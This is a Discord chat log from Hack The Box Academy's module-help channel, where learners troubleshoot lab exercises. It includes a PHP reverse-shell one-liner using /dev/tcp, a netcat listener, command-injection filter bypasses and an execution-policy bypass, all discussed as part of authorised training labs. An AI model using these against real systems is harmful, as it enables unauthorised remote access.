#modules

how about custom exploit?

..

wym?

and I feel like the AD module on the academy is not enough. Is there any knowledge about AD that I should learn more about or is there any document that talks more about it?

dont run just take a step by step

finsih ad modules here first

i'm done

its just a intro to AD

the CAPE path goes a lot deeper

Can I ask something for a second

Kinda random

But I need help

What is it?

this has some stuff https://zer1t0.gitlab.io/posts/attacking_ad/

I’ve deleted a chat on instagram and I have regretted it, is there ANY way I can get it back?

megalul

What’s that?

There is no way we can help you with this

Absolutely nothing?

It’s just gone?

I felt the same until I did zephyr and got to practice AD a bit, afterwards I felt much more comfortable. Some tier3 modules are also pretty nice in the AD context

ggs

guys,except the module for ADCS,does anyone has any blog/public/somewhere to read on theoritical,about Certificate Services?

When you ping an IP how do you know if you are pinning a local host or a vm?

ping dont give any info like this

its just to know if host is reachable and up or no

thankssssss

What if you use flag -O?

i love u so much

🥰

nmap dont detect the verion or OS 100% right alot of false positive stuff u can get from nmap

TTL from nmap output is another way to determine OS/VM

Hi folks, where can I send my troubleshooting request?

I couldn't see any other channel where I could send texts.

https://dontasktoask.com

I need help with my account verification on HTB discord.

Reach out to an online mod (shield next to their name)

@storm elk are you the mod?

They are a mod

I am, yes

Not necessarily the mod

Feel free to dm me and I will help you sort it out

thanks for responding, and thanks for help.
I need help with account verification on HTB.

As there's no one mod to rule them all

Everyone is awesome

Sparkling is now the mod, master of all mods

I am not, far from I am at the bottom of the foodchain

In sparkling we trust

does anyone else have problems with commands not working, the ones HTB gives you in the modules, it has happened to me twice, first with the nmap script command not working in the NFS portion of Footprinting (had to google an alternative) , and now in DNS portion where I'm getting "missing property name after reference operator" error after I put in a simple 'dig ns <domain.tld> @<nameserver>' command

Can you show me a screenshot? @tired atlas

You can verify your account via #welcome . Identifier can be found here: https://app.hackthebox.com/profile/settings

wait i'll verify

oh my i dont have a HTB account, only an academy one

You should be able to make it via the HTB account? https://account.hackthebox.com

yeah I'm doing that

Microsoft Learn and official documentation

I actually cannot lol, I graduated uni like 2 months ago, and my uni blocked my email

I had a doubt for the LFI module. When I have RCE i can execute simple commands like ls or cat but when i input a reverse shell and listen on my own machine with nc e.g

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/my_ip/9001 0>&1'") ?>

nc -lvnp 9001

the server hangs but I dont get a connection, even when i am listening on the correct port. Why would the server hang but not connect to my machine?

I am sure support will help you

No they wont 😭 , I actually cannot afford silver subscription

If uni disconnected there account, nothing we can do but recommend them to other available subscriptions

I was refering to them not being able to create a lab account with their Academy account

And are they not able to get back their Academy account if uni blocked their email?

Ahh okay. Gotcga

We can help recover but with evidence and proof

okay 🙂

just wanted to say thanks to the mods here for doing a great job

thank you @autumn sorrel

Good morning guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?

Hackers, any help would be appreciated.

dear all I am new to HTB, but when I go to HTB Academy it shows
We need to perform some compliance verification actions regarding your account!
Please contact us via the support bubble at the bottom right of the page or via the support email at customerops@hackthebox.com.
We are sorry for the inconvenience!

I need your support

Hello

Okay ✅

Can anyone help me with HTB Linkvortex machine

Have you been able to make contact with any official mate
@rustic anchor

Yes 👍

I emailed on mentioned email but no response

How long have you been on this mate ?
@rustic anchor

Can I dm you @bitter grotto ?

Best to ask in #boxes

I don’t have access to this no access

Read and follow #welcome

I created account for HTB last year but this issue I faced and still facing

Hi, I have a problem with the module "Internal Password Spraying - from Linux". I tried searching in Discord but couldn't find any actual explanation. I'm looking for a user that starts with the letter 's' whose password is Welcome 1. With kerbrute I got nothing but with crackmapexec I got another user that starts with the letter 't'. What am I doing wrong?

@rustic sage I need help

please no scammers wtf

did they dm you?

yes

please fwd to me

(you can dm me)

Then block it for your own protection. Do not click on any links

Yeah, that's what I did

hi @storm elk I need help to access academy.hackthebox.com, I am facing issue to access it shows message titled Account verification while my email is verified

I am not sure how I can help you with that, I am just a Discord moderator. Best to ask support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

^

Anyone?

If someone know.

Which old domain?

The old one was paypal.com

Now it's facebook.com

The module has been revised and therefore the questions are also slightly different. It may well be that facebook is now asked instead of paypal

according to you, what is difference between red team operators and AD pentesters?

Red Teamer can perform actions on the physical side: copying badges, picking locks, etc.

red teamer or mafia -))

https://www.pwc.com/mt/en/publications/technology/red-teaming-and-penetration-testing.html

What you are describing here is a physical pentest

Both

Awesome, hello!

There are few things that need to be updated. Few functionalists location in tools are change to other location. How I can request to HTB for updating these content in module?

What I mean is that a Red Team operates on the digital and physical side.

Hello, do academy got pwn module ?

like the buffer overflow modules

I saw the two of them but not more

anyone?

in my experience, not getting the desired results is a matter of using ' and "

web servers like nginx, apache use "<User-Agent>", so avoid using "

You have to put ls+/ or cat+/

maybe but why would the server hang? could it be the firewall?

that module has a ssh connect?

nope

if not, then hackthebox's machines often block requests from outside

ah then thats prob it thx

Did anyone have trouble in the DNS portion of footprinting, when they did it? I've been at it for 6 hours

I tried kerbrute, crackmapexec and nothing. At least with crackmapexec I got a valid user but that's not the correct answer. I'm completly lost, I think something is wrong with the module

What exactly is not working?

Identify if its possible to perform a zone transfer and submit the TXT record as the answer.

This is the question

I've tried

trying to find subdomains, even installed dnsrecon, only to find the authoritative nameservers, the question is asking for the txt record of a failed zone transfer, however when I try dig txt <domain> and even <sub domain> it comes with the nameserver in the authority portion of the result, i'm getting no txt record, or anything.

Check out the || subdomains ||

I havent found any!!

Send me a DM about what you have found.

maybe: try recursive sub.. enum

i wish i knew how to code properly

coding is not needed

just tools

Hey, does HTB Gift Cards allows to subscribe to HTB academy as student ?

'kay.

What does this have to do with Academy modules?

@warm root please introduce yourself in #general after verifying your account.

Okay

Thanks

Network enumeration with nmap medium lab- i tried a lot of techniques but nothing worked idk what to do

Can you dm me

@shadow sedge

Sure

I would ensure you are using the correct VPN config file and take that note about the VPN config as a hint.

Pls subscribe

Hi everyone, just comleted the What's Next Knowledge Check box at the end of the Getting Started module (the one with GetSimple installed). I managed to get access and complete the section via Metasploit using this exploit, but I wanted to try giving it a go manually.
So I get a foothold manually and gain access to a webshell, but if I try entering any reverse shell one liners into it, my listen server doesn't seem to catch it. If I change my payload to instead run that reverse shell one liner instead of give me a web shell, my listen server still didn't catch it. Does anyone have any idea why?

<@&861185840277487616>

Sorry 😞

@Tub try a different one liner.

Or wait, you already have a foothold but you want to stabilize / get different shell ?

does your listener and payload have the same port?

are you also using your kali/Parrot OS IP as the LHOST?

it was a good one

I tried so many one liners

That's right. I wanted to run LinEnum on there but I didn't think that running it on a webshell was a good idea

I was yeah, but bare in mind I was trying to do it manually and not with Metasploit

I read that part, same concept still applies. Trust me I've made that mistake a good amount of times

oh I see, LHOST was an exclusive thing to metasploit, not a general term

yeah, so if you're using python3 -m http.server 8000 and have 0.0.0.0:8000

your LHOST is your machine

You have to add your IP to the payload

LHOST --> Local Host
RHOST--> Remote Host
that's how i remember it

correct

another way to remember is LHOST is Listening Host and RHOST is Target Host

Hi guys is there the site of ippsec where he puts retired boxes into the right modules?

I remember someone sending it before, think it was marcielee who sent it

https://academy.hackthebox.com/academy-lab-relations

thanks but it was an ippsec website

I need a little help how can i start Process Hacker?

yes he does have a site
https://ippsec.rocks

thank you, it was this 😄

read the book

Information Gathering - Web Edition
What is the API key the inlanefreight.htb developers will be changing too?

I don't understand how to find it? I have tried some tools show in the course and they don't find any comments or something to answer.

anyone do this module ?

Yes

No spoilers please. Dm me

Crawling is fun on the right subdomain

But what is the start ?

I mean, they are saying inlanefreight.com and in the IP inlanefreight.htb.

Almost like fuzzing is part of the module

Not inlanefreight.com

someone do you know how can i run this?

From rdp to the target

https://processhacker.sourceforge.io/downloads.php

yes i'm in but i don't know how

Yeah so I added the IP to the /etc/hosts and in the report from finalrecon I have one sub, and when trying : error.

How do you have the entry?

Wdym?

here

Did you add the subdomain in your hosts file?

Yes:

cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 debian12-parrot
94.237.58.147 inlanefreight.htb

What does your entry look like in the hosts file

Don’t see the subdomain

^

But I have to enumerate them??? How?

It's in local.

That’s part of the module?

Check under c:/tools

vHosts needed for these questions:
inlanefreight.htb

That's your starting point

You need to enumerate until you find nothing new

Ah okay I understand marcie xd, we misunderstood each other.

^

Yeah, that's not a subdomain

I thought we didn't need that, at least that's what I understood from your answer.

That's a different domain entirely

No but to find the subdomains, I thought we had to add them by listing the other one, with the ip.

i can't doing 😦

No

Doesn't the module have a list where all the tools are located?

Read vhost enumeration

Also, that's not how windows works

then

i have just this

No but I rewatched but I thought it was a question apart from me, hence my initial question to Marcie.

Okay 🙂

What you have, is brain damage lol. I suggest learning windows basics first

¬¬¬¬¬¬¬¬¬¬

You were trying to do linux syntax in windows

then what can i do?

Use windows syntax

U can try running this in cmd powershell -ep bypass

That's not their problem m8

mb

.

I usually use that and it allows me to use linux commands

They're in cmd

ahh

And no, it doesn't 'let you use linux commands'

Lots of things in powershell are aliased

ls is an alias

I mean like ls and cd some basic common ones, and thanks for clearing that up

ill search what it does

cd is just a commonality between each

ahh I see

some commands are same in linux and windows but very few
but they might have diff syntax tho

ahh okay

Powershell aliased a bunch of things

nothing...

-ep == execution policy

thank u

You just launch a ps console with a bypassed execution policy, meaning you can run commands and scripts that may normally get blocked

then?

My explanation wasn't towards you

I suggest checking where the tool is located from one of the module sections

Or maybe you can use the windows search feature to launch it

the problem is that the commands i cannot use

It's not that you cannot use commands

It's that you're using invalid syntax for the os shell you're using

okey

i will try another thing

If you haven't already, I suggest the intro to windows cli module

That'll get you familiar with windows syntax

I'm going to take a shower and I'll be back later

I already completed it

Then you forgot your basics

maybe

Not a maybe

😦

You literally posted a screenshot of you using linux syntax in a cmd prompt

hello i am in Stack-Based Buffer Overflows on Linux x86 skill assessment

i got buffer overflow but in normal user and i cant read /root/flag.txt

> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52618
cat /root/flag.txt
cat: /root/flag.txt: Permission denied
^C```

any body ?

Hello guys,
Have an issue with my module linux, it ask me :
What is the index number of the "sudoers" file in the "/etc" directory?
Here my answer:
1760669
Here how i found the result:
stat /etc/sudoers
File: /etc/sudoers
Size: 415 Blocks: 8 IO Block: 4096 regular file
Device: 254,1 Inode: 1760669 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-01-15 11:56:15.129999999 -0600
Modify: 2024-10-07 05:07:43.764188599 -0500
Change: 2024-10-07 05:07:47.677515898 -0500
Birth: 2024-10-07 05:07:43.657522095 -0500
And my answer is false, what's happenning ?? Bug?

Completed, thx for confirmation :>, marcie as well :>!

Great job

Are you ssh into the target?

bro ?

.

You might be on ur own with that ngl 😭

No

Should probably do that

hello

are you root tho?

no

We see the message bro

I haven't done that one

…

> nc -lnvp 3301
listening on [any] 3301 ...
connect to [10.10.14.16] from (UNKNOWN) [10.129.42.191] 52874
id
uid=1001(htb-student) gid=1001(htb-student) groups=1001(htb-student)```

you’re not root, so how could you read a flag in the root directory?

Good answer ty, but i absolutely don't understand, they nevers asked to go on ssh 💀

Yeah they did

First question, just above

Introduction to Digital Forensics : Skills Assessment
Determine the registry key used for persistence and enter it as your answer.

Do we have to use only Velociraptor? If possible, can I have a hint? Thank you.

Preferably, yes. Velociraptor has some pretty neat pre-configured hunts that you can use

yea i know but i am stuck on this question i can't find a good Artifacts that describe registry

Hi guys, query on the Skills Assessment of Windows Privilege escalation PT 1.

Question 2:

“Find the password for the ldapadmin account somewhere on the system”.

I got the answer after privilege escalation I don't know if this was the target or I should have found it first, I have tried all the techniques and I could not find it without privilege escalation, anyone could find it without privilege escalation?

I don’t think it’s possible without escalating first

Oh ok thank you !

Whoever put the "thick client / fatty" section in the "Attacking Common Applications": I hope that your pillow remains warm however many times you turn it around, and I hope that you always get something stuck in your teeth when you eat

not that it is disproportionately hard in comparison to the rest of the module (it is), but the infra doesn't follow the course content, so you do literally what it says in the course contents and it doesn't work, and you think to yourself "huh, I must be stupid, let me try again" and it doesn't work again.

Then you turn off the machine, restart the environment, wait a little bit for everything to settle. Try again, this time carefully moving through the course and... hey, it doesn't work again!

And then you do it another day, again, it doesn't work, you check the forums, you look at what people who have succeeded have done, hey, you've done all those same things and it didn't work.

And then, one day, you just do the exact same thing you've done for like 25 times now. And it works. It works. Why does it work now? Why?

rant over, I'm going to try finish that module now 🫡

Average thick client experience

Hi guys

does anyone know why the frik my firefox is so slow? I have like 9GB assigned to my VM

3 processors too

Finished. It wasn't even that hard! It was just stupid! It didn't work and then it magically started working. Argh!

If it's slow on all websites, but other software works, it's an issue with your version of Firefox. If other software is also slow, then it's a RAM/CPU issue, check top (or Task Manager if you're on Windows). If it's slow only on some websites, it's those websites.

thanks, do you know how I can update my firefox in linux?

it depends how it was installed - if you're running a Debian derivative, probably apt-get update && apt-get upgrade will get the job done. If you're on some other platform or it was installed through flatpak or something, then Google for that specific platform

okay thanks, appreciate it 🙂

anyone arounf for a nudge on Skill Assestment - Injection Attacks

Ja

dming you now

hello i hope i am in the right place i have been stuck on the flow control loops Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. i keep getting the same answer but it is not right

So sorry mate

Include a link to the module / section so people know what you're talking about 🙂 Sure, a name is fine, but a direct link helps.

it is how the world works, i went to school for cybersecurity and i liked the school portion but now i that i am trying to find a job and do things like htb i now know i am in the line of work

https://academy.hackthebox.com/module/21/section/128

So earlier in the section there is an example of looping n number of times. In the Exercise Script you are provided with the information you need, and a place to put the steps to answer the question. I'd say double check how you are looping, that you're looping the right number of times, and that you're setting the variable in between loops correctly.

It's a Tier1 module, so can't say much more detail here

and it's not a module I've done personally, so if anyone else wants to give some advice in DM, or here without giving it away, go for it

i have been at this for 4 hours i am going to give up thank you for looking it, if i am not going to get by now i am not going to get it at all

Hello! I'm extremely new to HTB, and was wondering about unlimited pwnbox access?

You gain unlimited Pwnbox access via subscriptions: https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

(monthly and annual)

can you setup a pwnbox on vm?

I mean, im still new to all of this in general as well. I do have VMware

And if I buy cubes (just the cubes themselves) does that grant access to the box or no?

I don’t think so

Ahh. Well I appreciate the answers and help

Anytime man

What module are you doing lol?

Just finished navigation on Linux Fundis

nice I am doing pen testing lmao by the time I finish school I wanna have my life set so yea

That’s what im aiming for too. But also wanna try to help the online community best I can yf?

yeah I get that lol good contribution

I set up arch in three hours, I think I don’t know what im doing

uh arch is relatively hard to setup if you have no previous knowledge of Linux so I don’t blame you

Still looks cool tho

It is lol I am more of a kali guy tho

Hello guys , im new here and im starting to do the first module Linux Fundamentals, maybe i didnt understand why gives me a Error everytime i wanna connect to "My workstation" and do the question from lesson to continue in the right way, if someone can tell me something about it i will apreciate, thanks...

You can do it from your own vm

i have vm ones ready but i dont know who install vpn there

and also i dont wanna disturb you or someone more, just i will check it

Openvpn is already installed on parrot and kali

but im lost a little bit me english is not really good in off

ive noticed a few of those questions' answers are out of date

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

ah thanks, and sorry 🫂

but still, dont let it get you down

you can do it broski

Nope

they were for me

They provide a target to ssh into

So the answers shouldnt be out of date

when i was using the pwnbox and had to use the uname command to enter the kernel release/version, it wouldnt take it

There's a target you need to ssh into

googled it, found out the answer to the question was 2 versions behind what was on the pwnbox

yes im aware

The target isn't the pwnbox

hmm

Yup, exactly that

i cant reconnect atm because i already did my one per day

You can connect with the VPN instead

but if i do it again and it switches from 6.5.0-13 to question answer then ill be flabberghasted

Pwnbox is a web hosted attack box
Target is a machine somewhere meant to attack/connect to

wait

does that mean i could theoretically use my vm?

Yes

Not theoretical

https://academy.hackthebox.com/vpn

.

ahh so thats why theres a download vpn connection there then

Yep

Error validation quest

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Try changing vpn regions

In stealing hashes module, how can SMB Auth from a windows box over a chisel proxy? Wouldn't 445 be in use already so don't understand how chisel has bound to it? The server comes started on the box for this lab, am I thinking about this wrong?

Chisel just reroutes, doesn't necessarily bind to it

Also idk what you mean by "stealing hashes module"

What's the actual module name?

Yeah but if DC01 tries to reach my attacker box how can it?

Using CME

Chisel creates a port forwarding bridge

But the LNK file points at my attacker box, so it shouldn't even be talking to MS01 that's running chisel?

It says hey, take requests bound for x machine:port and send it to y machine:port

It has to talk to ms01 to reach your machine

Ah okay, so when DC01 tries to hit my IP the chisel server will also be responding to that IP for me?

Otherwise it can't possibly reach you

Then routing the traffic, think I get it now thanks haha

I thought since the chisel server is already running in the lab there was some config needed

@fathom pendant . This is in my own vm

1. You need to download the vpn file
2. run with sudo

thanks so much : )

need help with a module in the windows attacks & defense
i am on "Kerberoasting" and am having a hard time ssh ing back to the kali machine
keep getting an error "ssh: connect to host 10.129.204.151 port 22: Connection refused"
i am doing what it said to do in the overview, I got the passwords into a file. Now i need share the file back to the kali vm from the rdp machine.

excuse me, at the footprinting module DNS section, what is this asking us to give?

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

i don't understand what they are asking for?

Fqdn is like www.google.com

Fully Qualified Domain Name

It's asking for the fqdn of the name server

heyy i have a problem, why i dont have openvpn installed on my parrot os in vm?

sudo apt install openvpn

it says that openvpn is already the newest version, though when i try to use it terminal says command not found

How are you executing it?

(what command are you running)

Also run it with sudo

🤦‍♂️

lol

aight, works with sudo

thanks

ye it doesn't works without sudo

also you cannot even autocomplete the given file's name in the terminal

Hello, I am a newbie student and I need help with something could anybody help me please?

Are you sure on this? I'm just really confused

Here's an example
DC01 - 172.16.0.1
MS01 - 172.16.0.2 & 10.10.14.1
AttackBox - 10.10.14.2

How can DC01 opening a LNK file pointing at AttackBox not drop the connection? I understand chisel is forwarding traffic that reaches MS01, but the LNK file doesn't point at MS01?

you need to run it as root/sudo anyway ¯_(ツ)_/¯

It can’t

But why not just open inveigh on the windows machine?

That's what I would normally do but It's on the module CME - capturing hashes and it uses chisel, so was wondering how it's possible

do i have to connect to new vpn for every new exercise/section?

No

so just regenerate targets

Yep

Module: Password attacks, section: network services
When I try to brute force password on ssh with nxc, after first few failed attempts I get ERROR Internal Paramiko error for training4:1234567, Error reading SSH protocol banner. I set threads to 1 so I guess it isn't rate limit?

Ssh sucks to bruteforce

and ultimately, would stop loading and I won't get a revshell. Is there something on the server that prevents it?

You can try to set listener on different port, maybe firewall blocks connections to specific ports

I tried, thats why I shifted to 80. Lemme try 443 as well

not getting a hit

Try to inspect it in wireshark

To see if you get any request

response*

I'm not getting any responses..

I mean, I have got the required flags, but I just wanted to kill the minor inconveniences haha

Can you ping your host from target to ensure your host is reachable

Through command injection

I think there might be restrictions on the public machines

tried &cmd=ping 10.10.14.4 but that didn't get any response other than
selected_language|s:31:"";preference|s:7:"Spanish";

Can’t remember if that one is public tho

Very likely. I think they desgined to get the flag in a particular way

The target is running on a docker container, not inside academy's network. You're not going to be able to ping your tun0 IP address with it, nor establish a shell to it. you'd need to forward ports in your gateway/router etc and have it forward traffic to your kali's box, if it has an IP on your internal network

also if you're running a listener below port 1024 you're going to need to use sudo to bind the port

You're not gonna get a callback

It's a public docker container, it's not meant to be able to call back to other machines

You gotta use burp

You don't have to use burp

Is it ok to do Attacking Enterprise Network partially blind and understand what and why I missed out

I feel so guilty seeing one walkthrough yesterday haha

There shouldn't be any walkthroughs for it, the module itself is the walkthrough

It's a module above t0

I suggest making sure you understand where your methodology is failing you

Ya the module walkthrough

I didn’t check through all the services and assume only those common ones like SMB FTP are vulnerable

Treat everything as a blank box

Assume nothing

This is also advice for the exam, assume any system you run into on the network is a blank system, unless you pillage info that says otherwise

Got it, will learn from my mistake thanks

Enumeration is an iterative process; each system you start from 0

is this the only support for htb

Support isn't on the discord

If you need to contact support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Assuming it's for academy and not labs

i am stuck on a question and about to give up on working in this field

Well if you say what you're stuck on and what module and section you can get help

https://dontasktoask.com

Introduction to Bash Scripting Flow Control - Loops i was in here earlier and was told since it is tier 1 it is easly

i am new to his field

https://academy.hackthebox.com/module/21/section/128

I believe the bypassing filters section goes over how to test for which chars are triggering the filter

Your first filter is missing something

Make sure you're not adding a new-line or whatever with b64 or echo

I didn't do it on my main laptop/vm so I don't have the code

It's not triggering the filter, it's just giving me a null output. The filter for this particular exercise is front end and the output would be "invalid input" if it triggered the filter

You don't need to see the value

i dont know what that mean

Read the question carefully

The number of characters in that last iteration is what should be assigned to the salt variable

And then, when the code is executed, you'll get the answer

Would you mind expanding on this a bit?

From my understanding, the first payload should output something like:
ping -c 127.0.0.1;
ls /home

which is essentially the same output as the second payload if I'm not mistaken. I was at a wall with the first payload until I simply tried a different bypass method.

Yeah mb, are you sure ; is a valid bypass character

That's more what I meant

Also it wouldn't output something like that

You don't have a newline character

Deleted your og message since it's a spoiler, spoiler text does fuck all

From the lesson I gathered that ${IFS} was the same thing

Nope

as new line

sorry about that

It's more of a whitespace

Yeah, there's ways to determine that

Fun fact ${#var}, echo -n $var | wc -c

Interesting. Well in that section it says "So, let's try to use environment variables to add a semi-colon and a space to our payload (127.0.0.1${LS_COLORS:10:1}${IFS}) as our payload, and see if we can bypass the filter: As we can see, we successfully bypassed the character filter this time as well." so I got a bit confused

semicolon and a space

:)

ahhhhhhhhhhhh

ok thanks for your time! ❤️

I get it now

My next question is how come a space bypasses the filter, but gives me no output on the HTTP response, but the new line character does give me output on the HTTP response

I'm doing the proxying tools module and I can't get the proxychains to work correctly and send the traffic through burpsuite. I've changed the last line of the configuration file like in the instruction to http 127.0.0.1 8080 but when I run the command proxychains4 curl http://94.237.50.135:32600 the burpsuite doesn't intercept it. It does however when i use this command which was proposed to me by chatgpt curl --proxy 127.0.0.1:8080 http://94.237.50.135:32600

I just don't know why the proxychains isn't working as it's supposed to

As if it didn't care about the configuration file

Proxy stuff is finicky like that

cool

Did you try running proxychains with sudo

Awesome

Hey. Fuck off

You're not official support in any capacity

Don't join that server

I just did and the result is the same

I get the response but it doesn't go through burp

Do you recommend I just ditch the proxychains?

Yeah

🤨

You only need to count the var length at the end

I notice a lot that those modules are often outdated

That some things are done different in new versions of programs

And it's just confusing

@deep bluff Kaisa hai bhaiiii

Hello there everyone !

#rules English server

i realize that as soon as i sended the msg

It could be wc -m not -c

Well Can you guys help me out ?

Well, you didn't ask a a question

https://dontasktoask.com

;-; okay so i am planning to purchase a laptop for myself . Specially only for office works not for hacking. so should i go for mac m1 ?

That has nothing to do with this channel

Read and follow #welcome to be able to access other channels

it did not change

Well you need to update the var variable, take a look at what you copy/pasted again

You're updating a variable named ar not var

the bold it #

That's discord formatting it with markdown

If you link your account via #welcome instructions you can do code blocks, but I'm yeeting them bc spoilers

It looks like you're not encoding the variable in b64

Understanding the instructions is important

Wrong

You only count the characters after the loop

Otherwise your variable then becomes;
Var --> base64 of that var --> length of that base64, which once you're at a certain point is just iterative

now var equals the result of wc -m

^

Which then becomes a repeating digit because length

take the -n out

Iirx

It's been a minute

yeah i just tried it

You do need it for the var iterative though

i got 34070 and it was wrong

Because that's not gonna be the answer

The salt value is used to decrypt the message to give you the answer when you run the script

The length isn't the answer it's only part of the solution

That's why you insert the for loop where you do

lock in man you got this. Take a break if you need to

i have been at this for 8 hours

maybe you need to take a break and come back at it fresh again later 🙂

just part of being human sometimes

what else are you stuck on?

it is the only question for this module

theres 2 parts to the question

Part 1 is getting the loop, part 2 is running the script and getting the answer

The answer will be HTB...0x

thats not the number

you were closer before

just assign the salt variable to the amount of $var characters so you will get the flag automatically

Am I wrong in remembering ${#var} for count

i am trying to find the code i had when i was closer

not sure this is the my first time looking at this module

I somewhat like this question as it mirrors what you'd see in a coding interview type question

It's a general bash thing

just used seq and wc --char <<<$var

that would be better tbh

Many ways to cook an egg

hi folks

Got a question about Attacking Common Services -Assesment Medium

I actually resolved it.

But for the "thing" we need... I ended manually editing that thing, removing extra spaces, etc.

My 50 inches monitor helped 😂 but I know there must be a more elegant and proper way to do.

Not sure about manual editing

do i have the wc in the correct place

I suggest stopping posting the code

I mean... I edited the || ssh key manually. I removed the extra spaces ||

I didn't have an issue with extra spaces

small issue here with this or im just confused

did you resolve it recently? Maybe the exercise changed.

the result is 1 chracter smaller than the answer 😂

I initially got a || Load key "id_rsa": error in libcrypto ||

That is only part of the problem

The salt is used to decrypt something

Run the whole script

i thought i was

You're missing the bottom part of the script

The answer isn't a number

the salt variable should be getting used

The wording on that question could be a bit clearer to be honest

i think i decrypted it and it starts with U2Fs but it did not work

marcielee already said it should start with HTB

Was gonna say take it to DMs, but I'm so tired of watching for spoilers for content over Tier 0

It's literally in the channel subject

so I'm done with that

I've been nuking the script excerpts

Appreciate it

It just never ends

you can dm me the script

I'm eating some corn that's popped

Popped corn? Hmmm interesting

That could catch on

you have to add someone to dm right i have not usred dicord very many times

Depends on how they have their DMs setup

Mine used to be open, but I changed them recently

You should ask to DM before doing so as well #rules

some did ask i am trying to figure it out

i think i sent it

I tried without removing the extra spaces and it fails. It needs formatting for sure.

¯_(ツ)_/¯

https://tenor.com/view/doctor-who-wilfred-mott-sad-wave-disappointed-gif-5710930

this is what I am talking about

I tried with awk

But it is a real pain

I love looking for mats at the weekend

Yeah that's weird, considering it should be new-lines

I wonder how you copied it

The protocol used probably did something funky

I did not even copied it, lol... I move the whole thing via python upload

thanks for the help i am calling it quits if i cant figure it out now i will not be alble with someone i know your not giving me the answer i get i need to learn but i am a classroom learner

that'd probably be why

no no, it is like that in the server itself, lol

I think you're close michael

because it is part of a || mail ||

Yeah i know

Want one last go in DM, show me what you got?

But sometimes pop3 and imap have minor differences like not encoding the newline properly

let me ssh again

wait what? lol ... what did you say?

I just used the method to connect directly to the mail portion of the server

I did NOT obtain it that way, lol

https://tenor.com/view/cat-kitty-surprised-shocked-oh-my-god-gif-15440994307613885016

Aha

that's a different way

https://tenor.com/view/batman-dc-hmm-thinking-gif-4575661

You mean, using same creds for the POP3 server?

Or imap(s)

ok, 1 sec

That is probably why you were getting a cleaner format

same thing

https://tenor.com/view/cry-guy-listening-to-music-crying-music-music-sad-gif-1436056687197982910

Weird I don't recall that formatting issue

Connecting through a windows commandline, or powershell?

Although I think pwsh on Linux uses just LF instead of CRLF as cmd does

Even so, an LF should stil break line on cmd right?

Also spoiler tags do sweet fuck all

Your image contained the username user@inlanefreight.htb

Fixed it

👇

https://tenor.com/view/tkt-smart-gif-20642718

freaking spaces, lol

now I can go to bed and I won't be thinking about it all night

I didn't use a mail client

but I did 😂

no idea, honestly

I was getting those weird formatting errors using the other protocol as well

Thanks anyway. Netflix and cookies time. Then bed. Last season of Dark. But it seems I will have to repeat the whole thing again 😂 what a complex show

https://tenor.com/view/hospital-hello-nurse-gif-26601570

did anybody have a clue with .vhd file in password attack lab - hard?

i already using john to crack the password but didn't give me anything

Did you do the proper 2john tool?

yap i already

but i think i already figure it out

i forget to use the grep "bitlocker $0"

Hi, I am on module Command Injection - Advanced Obfuscation, doing the task, who can help me out with the payload?

Where can I learn video editing guys?

yeah dm the payload

On a server that's more focused on video editing?

Google

Hi guys. I looked it up. Synack has network pentesting bounties. Other bug hunters I have talked to say I will be behind more experienced pentesters if I do it but also that doing Synack is a good way to get real world experience and once I get my CPTS its a good place to practice network hacking skills legally. Synack Red Team professionals told me this.

Even if I’m behind other pentesters, real world experience helps. I know Synack does network pentesting because I talked to Synack admins and people that have worked there and looked at their website.

Ah yes, definitely not biased

Ok so you’re saying their platform has people telling me to do illegal things? How would that help them?

When did i say that?

Its on their website. They call it host pentesting

What do you mean biased?

I just meant the people giving you the info are biased

Look up the definition of the word

Its not just bug hunters I looked on Synack’s website and its there

Biased != illegal

They call it “host penetration testing”

It just means they're more likely to lean one way when talking to you

Of course Synack would wanna coax you into joining lol

They also do cloud, mobile, web, and even social engineering pentesting according to their website

Ya but why would they lie? That would be fraud

They lure you in with their "real world experience" and drop you onto a web bounty cos thats all they actually have

Didn't say they're lying

And if they aren’t lying then are you saying using synack to practice hacking is a bad idea?

If so, why?

You have to actually get the work

Oh ok ya

They don't just hand you something to do

Also this is more relevant in #careers-and-certs

Ok let’s move convo there

Hey there, currently doing CDSA course, I don't understand why sometimes like for example the module "Windows Attacks & Defense" - "Credentials in Object Properties" , 3rd question I was asked to find the TargetSID for the user Bonni from Windows Events, but I don't have any events having the user "Bonni", it happened also when I was first section "Kerberoasting", 3rd question " what is the ServiceSID of the webservice user" and I didn't have any "webservice" user anywhere from Windows Event - Security

I searched through Windows Events gui and also using Powershell, I was able to find all other users except the ones in the question

Did you try checking the DC?

Yes the question is asking to connect to DC1 with some creds, so I'm looking from there

About Kerberoasting there were a lot of logs so I was thinking okay maybe I missed something somehow, but for the "Credentials in Object Properties" there were not so much events and going one by one, I couldn't find "bonni" as stated in the question

did you filter 4771 and account name?

yes

PS C:\Users\htb-student> Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 and */EventData/Data[@Name="TargetUserName"]="bonni"'

Get-WinEvent : No events were found that match the specified selection criteria.
At line:1 char:1
+ Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4771 an ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:) [Get-WinEvent], Exception
    + FullyQualifiedErrorId : NoMatchingEventsFound,Microsoft.PowerShell.Commands.GetWinEventCommand

Same thing by searching manually with the gui

i just did it with xml filtering

Alright, thanks for your time. I'll try to reload the machines tomorrow and see

Hey I can teach video editing

oh man can't wait for the bots to start scamming eachother

😭

